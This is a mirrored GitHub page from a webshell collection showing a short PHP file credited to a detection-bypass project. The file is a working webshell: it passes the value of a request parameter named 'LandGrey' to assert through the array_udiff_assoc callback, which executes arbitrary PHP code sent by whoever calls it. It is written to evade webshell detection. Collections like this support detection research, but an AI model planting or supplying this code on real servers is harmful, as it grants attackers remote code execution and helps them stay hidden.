mirror of
https://github.com/tennc/webshell
synced 2024-11-10 05:44:11 +00:00
32be5d26bf
From:https://github.com/LandGrey/webshell-detect-bypass/tree/master/webshell/php Author:Build by LandGrey
8 lines
145 B
PHP
8 lines
145 B
PHP
<?php
|
|
/**
|
|
* Noticed: (PHP 5 >= 5.4.0, PHP 7)
|
|
*
|
|
*/
|
|
$password = "LandGrey";
|
|
array_udiff_assoc(array($_REQUEST[$password]), array(1), "assert");
|
|
?>
|